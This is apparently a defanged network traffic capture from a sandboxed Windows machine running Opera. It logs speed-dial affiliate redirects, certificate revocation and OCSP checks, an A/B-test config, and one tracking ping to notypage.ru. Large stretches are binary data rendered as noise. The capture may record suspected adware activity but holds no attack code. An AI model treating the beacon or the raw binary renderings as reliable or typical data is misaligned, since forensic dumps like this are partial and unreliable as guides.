M....K..\.L...pH.yX.L.....<.E.....ul..e........#..8...].K.g3.....O.
.)..L..%...H....hx.G..%.>.1..V.x=NfJO...0...v....-.Y.....mv. .Z..BL
.8.S:...O..

<<< skipped >>>

GET /speeddials/partner/facebook HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.facebook.com

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:37 GMT

X-Varnish: 2724563495

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.facebook.com..Vary: Accept-Encoding..Cont
ent-Encoding: gzip..Content-Type: text/plain..Content-Length: 26..Date
: Mon, 23 Feb 2015 09:31:37 GMT..X-Varnish: 2724563495..Age: 0..Via: 1
.1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS.............
...................

GET /speeddials/partner/amazon_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.amazon.com/?tag=operadesktop14-sd-us-20

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601883

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.amazon.com/?tag=operadesktop14-sd-us-20..
Vary: Accept-Encoding..Content-Encoding: gzip..Content-Type: text/plai
n..Content-Length: 26..Date: Mon, 23 Feb 2015 09:31:38 GMT..X-Varnish:
 2598601883..Age: 0..Via: 1.1 varnish..Connection: keep-alive..X-Varni
sh-Cache: MISS................................

GET /speeddials/partner/ebay_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574672411&toolid=10001&campid=5337314645&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:41 GMT

X-Varnish: 2598602696

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://rover.ebay.com/rover/1/711-53200-19255-0/1?ic
ep_ff3=1&pub=5574672411&toolid=10001&campid=5337314645&customid=&ipn=p
smain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg..Vary: Accept-En
coding..Content-Encoding: gzip..Content-Type: text/plain..Content-Leng
th: 26..Date: Mon, 23 Feb 2015 09:31:41 GMT..X-Varnish: 2598602696..Ag
e: 0..Via: 1.1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS.
...............................

GET /speeddials/partner/yahoo HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.yahoo.com/?ilc=400

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

X-Pad: avoid browser bug

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:43 GMT

X-Varnish: 2598603299

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.yahoo.com/?ilc=400..Vary: Accept-Encoding
..Content-Encoding: gzip..Content-Type: text/plain..X-Pad: avoid brows
er bug..Content-Length: 26..Date: Mon, 23 Feb 2015 09:31:43 GMT..X-Var
nish: 2598603299..Age: 0..Via: 1.1 varnish..Connection: keep-alive..X-
Varnish-Cache: MISS................................

GET /speeddials/partner/twitter_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.twitter.com/?partner=opera15-us

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:44 GMT

X-Varnish: 2598603826

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.twitter.com/?partner=opera15-us..Vary: Ac
cept-Encoding..Content-Encoding: gzip..Content-Type: text/plain..Conte
nt-Length: 26..Date: Mon, 23 Feb 2015 09:31:44 GMT..X-Varnish: 2598603
826..Age: 0..Via: 1.1 varnish..Connection: keep-alive..X-Varnish-Cache
: MISS................................

GET /speeddials/partner/youtube HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.youtube.com

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:46 GMT

X-Varnish: 2598604506

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.youtube.com..Vary: Accept-Encoding..Conte
nt-Encoding: gzip..Content-Type: text/plain..Content-Length: 26..Date:
 Mon, 23 Feb 2015 09:31:46 GMT..X-Varnish: 2598604506..Age: 0..Via: 1.
1 varnish..Connection: keep-alive..X-Varnish-Cache: MISS..............
..................

GET /speeddials/partner/product HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://VVV.opera.com/follow?utm_medium=speed_dial_thumbnail&utm_source=speed_dial_computer&utm_campaign=social_follow_us_page

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:48 GMT

X-Varnish: 2724566992

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..........................HTTP/1.1 302 Found..Server: Apache/2.2.16 (D
ebian)..Location: hXXp://VVV.opera.com/follow?utm_medium=speed_dial_th
umbnail&utm_source=speed_dial_computer&utm_campaign=social_follow_us_p
age..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Type: text
/plain..Content-Length: 26..Date: Mon, 23 Feb 2015 09:31:48 GMT..X-Var
nish: 2724566992..Age: 0..Via: 1.1 varnish..Connection: keep-alive..X-
Varnish-Cache: MISS................................

GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1

Cache-Control: max-age = 812

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 23 Oct 2014 05:05:32 GMT

If-None-Match: "a2f3ff97eeecf1:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com


HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Wed, 07 Jan 2015 06:02:43 GMT

Accept-Ranges: bytes

ETag: "88c4768d3f2ad01:0"

Server: Microsoft-IIS/8.5

VTag: 791768225100000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 813

Cache-Control: max-age=900

Date: Mon, 23 Feb 2015 09:31:51 GMT

Connection: keep-alive
0..)0......0...*.H........0_1.0.....&...,d....com1.0.....&...,d....mic
rosoft1-0 ..U...$Microsoft Root Certificate Authority..150106214825Z..
150407100825Z0.0...a......../..100208014912Z._0]0...U.#..0......`@V'..
%..*..S.Y..0... .....7.......0...U......(0... .....7......150406215825
Z0...*.H..............vQ..r..L.Q.N..=#.......V;..r../\.m..<.."...F/
U....(:.....xm.....P.e.F..BE8......=...G....6t:...?...L..B.v..p.M.....
...z..Q.%J.6..I.......8...U. .g..=T=K....L..$w...^....y~..-a.'...*s#N.
o..Qs.$h..:duV'~....8.6..w..b3.... .~)...|.I.y".>R.nJq.ws...3.....f
}.E)\......EB.d\.2.....h...lMjT.7..lj.'lj.b....".L.Os6{.s...@....f.|7z
.. ......>..Q...(......._....UM.EN.@.K\]#..Y.*.......T. .C.....A'..
5FW.ETDvX..tE.....g5.....&..&.....x.^H;...../7..'9.t.I&<[.HX.j....Q
w......}...qy3..q`<.....LB.9w|....;..Qw..a ..=.C.:.........


GET /pki/crl/products/WinPCA.crl HTTP/1.1

Cache-Control: max-age = 900

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Mon, 06 Oct 2014 05:06:02 GMT

If-None-Match: "3e1c83923e1cf1:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com


HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Sun, 21 Dec 2014 06:03:02 GMT

Accept-Ranges: bytes

ETag: "d2e35dc7e31cd01:0"

Server: Microsoft-IIS/8.5

VTag: 791141515700000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 561

Cache-Control: max-age=900

Date: Mon, 23 Feb 2015 09:31:51 GMT

Connection: keep-alive
0..-0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U
....Redmond1.0...U....Microsoft Corporation1 0)..U..."Microsoft Window
s Verification PCA..141220223154Z..150321105154Z._0]0...U.#..0.......p
............<.J0... .....7.......0...U......30... .....7......15032
0224154Z0...*.H.............h.~oH#i.J.vh_.....A'B..g...........F....9c
.{.m@Q.M.p...g.^ 4.r..Wv.Q.0.w..j....c9..w....I..%.~.l..F.......xo....
_...o...7BR.;<..\R/ .....b.(....~..]|.v.u.i.X.B....I......./*...P..
A..fi.}& .x.v{TFP[.G......A......L.o...)R.......V.u..V.../.Q..(L.]....
.uki~......


GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1

Cache-Control: max-age = 900

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Sat, 04 Oct 2014 05:06:12 GMT

If-None-Match: "58cddbea90dfcf1:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com


HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Fri, 19 Dec 2014 06:02:00 GMT

Accept-Ranges: bytes

ETag: "9a9a44d511bd01:0"

Server: Microsoft-IIS/8.0

VTag: 438466244800000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 550

Cache-Control: max-age=900

Date: Mon, 23 Feb 2015 09:31:51 GMT

Connection: keep-alive

0.."0......0...*.H........0w1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1!0...U....Microsoft Time-St
amp PCA..141218221600Z..150319103600Z._0]0...U.#..0...#4..RFp..@.v.. .
.5..0... .....7.......0...U......10... .....7......150318222600Z0...*.
H............./..0Q~.r.}.E....&\....F.Z.C..#..F.s........<&\..9G..-
....j..N... .C.Fk....;l.....2.K5D.........-.>...(...g.0.S.[?...T4q&
gt;.ln...z..L.......5.5s@d.q.('..e...Y..Bo..q..........I....'....i>
..y:.eH@h`..\...UA.m#.~.. ;.3..d..;..<..........p..s..J..N `Az.....
.@..lHTTP/1.1 200 OK..Content-Type: application/pkix-crl..Last-Modifie
d: Fri, 19 Dec 2014 06:02:00 GMT..Accept-Ranges: bytes..ETag: "9a9a44d
511bd01:0"..Server: Microsoft-IIS/8.0..VTag: 438466244800000000..P3P: 
CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR S
AMo CNT COM INT NAV ONL PHY PRE PUR UNI"..X-Powered-By: ASP.NET..Conte
nt-Length: 550..Cache-Control: max-age=900..Date: Mon, 23 Feb 2015 09:
31:51 GMT..Connection: keep-alive..0.."0......0...*.H........0w1.0...U
....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corp
oration1!0...U....Microsoft Time-Stamp PCA..141218221600Z..15031910360
0Z._0]0...U.#..0...#4..RFp..@.v.. ..5..0... .....7.......0...U......10
... .....7......150318222600Z0...*.H............./..0Q~.r.}.E....&\...
.F.Z.C..#..F.s........<&\..9G..-....j..N... .C.Fk....;l.....2.K5D..
.......-.>...(...g.0.S.[?...T4q>.ln...z..L.......5.5s@d.q.('..e.
..Y..Bo..q..........I....'....i>..y:.eH@h`..\...UA.m#.~.. ;.3..

<<< skipped >>>

GET /VVV.opera.com/firstrun/?utm_source=turbo&utm_campaign=turbo_newNI&utm_medium=pb HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 404 Not Found

Server: Apache/2.2.16 (Debian)

Content-Type: application/octet-stream

Content-Length: 0

Date: Mon, 23 Feb 2015 09:31:31 GMT

X-Varnish: 2724561392

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

HTTP/1.1 404 Not Found..Server: Apache/2.2.16 (Debian)..Content-Type: 
application/octet-stream..Content-Length: 0..Date: Mon, 23 Feb 2015 09
:31:31 GMT..X-Varnish: 2724561392..Age: 0..Via: 1.1 varnish..Connectio
n: keep-alive..X-Varnish-Cache: MISS......

GET /ping?v=1.2.15&q=wfj8ij HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Host: notypage.ru

DNT: 1

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:37 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: keep-alive

Cache-Control: no-cache

Set-Cookie: npbid=142468413776873290:1.2.15;Path=/;Expires=Tue, 23 Jan 2035 09:00:45 GMT;Domain=notypage.ru;
GIF89a.............!.......,...........L..;..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEH7hSm9v7/LTfz+tZU062rQ= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: s2.symcb.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1762

content-transfer-encoding: binary

Cache-Control: max-age=409981, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 03:22:53 GMT

Expires: Sat, 28 Feb 2015 03:22:53 GMT

Date: Mon, 23 Feb 2015 09:31:45 GMT

Connection: keep-alive

0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..2015022
1032253Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..~.Joo....?.eM:......20150221032253Z....20150228032253Z0...*.H.....
........h..7Xbm.%*.kSh.R...5zNp.FT..AC&.[.~Q....!M...n..!2h.D.....D...
..........A~.........3>.IZ.r.........n5.E......go...U..n.V.....4SuS
z@|.....L.bu~...g..HV..1....4B..q..t'.mG..."K.........-...u...\......h
..V3.pV....z.*. *..Ma.N.v.....3......U...<5....:.".....Z.....0...0.
..0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...141202000000Z..151216235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 30.."0...*.H.............0...............2&..PL...,..2....:..t
H...`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s..
...3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$".
.$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.
6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E...
.0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.
symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0
!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U
.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5

<<< skipped >>>

GET /res/servicefiles/ab-tests/20150113-4.json HTTP/1.1

Host: get.geo.opera.com.global.prod.fastly.net

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 13 Jan 2015 12:16:56 GMT

Content-Length: 1140

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:32:30 GMT

Via: 1.1 varnish

Age: 1567

Connection: keep-alive

X-Served-By: cache-ams4138-AMS

X-Cache: HIT

X-Cache-Hits: 81

X-Timer: S1424683950.934762,VS0,VE0

// USE5WrW8J hncOYlsFgIRSvkHehQE4w197KDnfk/GdeL1FK/KwMHMhH6IZB3RramVZR
IJkRCJFtlyLUaK8haFWaKS9Czm10s/NulCanIyQ5rJZnAvsirU14ZsGAieyxgr9x4UaeCe
fqO8eoFKlUO3Sjd76gLFkY2Ognpf 4ZpMq6SaGhxnMLeNXRzPJCN9ZOimqqEQ5OcvkI/Mt
HDA3BcwCt5UMMYkFvjXWFfJicJbB7vVd4j86QBfV4USXS0OtwsabUXF6JLaWK6WKPLyWbH
shaM29U eccc7sA8oAqMcuJk94R13sNk1O4z0vwHx3j/l0bbUXogMUg cfVPoKH5Q==.{.
  "version": 4,.  "Enhanced search experience": {.    "total_test_perc
entage": 1,.    "test_state": 1,.    "test_groups" : [.      {.       
 "name": "Reference group",.        "preferences": {.          "quick_
search.ui_mode" : 0.        }.      },.      {.        "name": "Blue B
utton on the Left",.        "preferences": {.          "quick_search.u
i_mode" : 1.        }.      },.      {.        "name": "Blue Button on
 the Right",.        "preferences": {.          "quick_search.ui_mode"
 : 2.        }.      },.      {.        "name": "Gray Button on the Le
ft",.        "preferences": {.          "quick_search.ui_mode" : 4.   
     }.      },.      {.        "name": "Gray Button on the Right",.  
      "preferences": {.          "quick_search.ui_mode" : 5.        }.
      }.    ].  }.}...

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1790

content-transfer-encoding: binary

Cache-Control: max-age=344420, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 09:12:27 GMT

Expires: Fri, 27 Feb 2015 09:12:27 GMT

Date: Mon, 23 Feb 2015 09:36:15 GMT

Connection: keep-alive
0..........0..... .....0......0...0........6?s....V....OlL".O..2015022
0091227Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
.A..2.....:...:......20150220091227Z....20150227091227Z0...*.H........
.......]-...@....&......j.L.t4&S.......3....:.......3..N..8.d....cZ..4
..*..s..7;.a<......e.6..}....s..q..o..\..i..t.}...H.{Nk..R...b%. k?
.)............V.,N...9t.....xN..w...u....X....bu...U.F..H....&."(e....
X.F...h....U:....B.D....[..j(.....w..~g..e.D"n...d@ @....#0...0...0...
.......<o&S.-S..}...e.30...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use a
t hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code S
igning 2009-2 CA0...141205000000Z..150305235959Z0..1.0...U....US1.0...
U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms o
f use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Clas
s 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.......
..{(..t....2.Vf.....&;6).i*FK....W@....F....jnb.w._p.E.6.|.mk....(....
......p...........X.DF....^0N....b9.:..J. ZK.".^..\..p.'.$..JA..~QG.d.
}...r...gv... f...z.#..}..J...r9h.........LI-..^.......PUD.h<.l....
(n..i.....E.....2....^./Y......Y.m...'...hz..y..E..........0...0...U..
..0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisig
n.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp.
 by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U.....
...0... .....0......0"..U....0...0.1.0...U....TGV-B-24710...*.H...<<< skipped >>>

GET /speeddials/partner/aukro_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/aukro_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598682957

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/yandex_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "c47e8-19b0-50ecea1134600"

Content-Type: image/png

Content-Length: 6576

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598682988 2598657979

Age: 71

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 4
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:8F72
BCF3BEC911E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:8F72BCF2BEC911
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:038011740720681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>@..\....IDATx....|T...'e.Cz....)R..........
"J..A. *E.Y.r..H.A.U....g.}.]..t..d..)$......3g&3y...}.M~...s....u.^{.
=..).O%.?...R...("K.Y."..Ed)"KQD...,Ed)..R....,E.Y."....("KQD."..Ed)..
RD...,E.Y..R...("K.Y."..Ed)..RD...,E.Y..R...("K.Y."..Ed)"KQD...,Ed)..R
....,E.Y.".....U.?^.....kJ..(]..t..7..o..}.....-.Y..:7...u......8gi4.J
.F...=.E"kK.|....j4..n.....D..&..lG..~..[$.6......J.....7..K.Jt..(B...
............:d....Hdm.kU^.....J...$fi.p.ta........Mm..$-'!E..D...L....
x..515.'..j~...v....)x........[4qr....%.6._....^c.jx...v...~.j...s<<< skipped >>>

GET /previews/images/product_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "7464e5-5742-50ecea1134600"

Content-Type: image/png

Content-Length: 22338

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644878 2724593312

Age: 148

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 26
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...liTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:39A0
391E5FFD11E3BBF2AA5BCBCE266E" xmpMM:InstanceID="xmp.iid:39A0391D5FFD11
E3BBF2AA5BCBCE266E" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:eb89270f-6547-4d76
-9b6b-f3a5ab54ecc0" stRef:documentID="xmp.did:4905A1941A226811822A85CA
614666AF"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>..G...SlIDATx..}.`.........d[.....m.6.@
..$.$.B...F.nz....RHx.TJ..Jh.cp..[.l..eY..^....~dI..X............."...
..g...O.............c...c...c|..`.....H...X..d.Q..S...d..|6.. dK.l.3..
.9k.......F9....k....3.......v...........`.....a....#.......k.....$)..
Q.s...K.........Ry..o.o...m@...R.,.....VW.....0..K......?.@o>......
......X...... u..}D..1.......s......Fd.......h..v...._..{...H.nk......
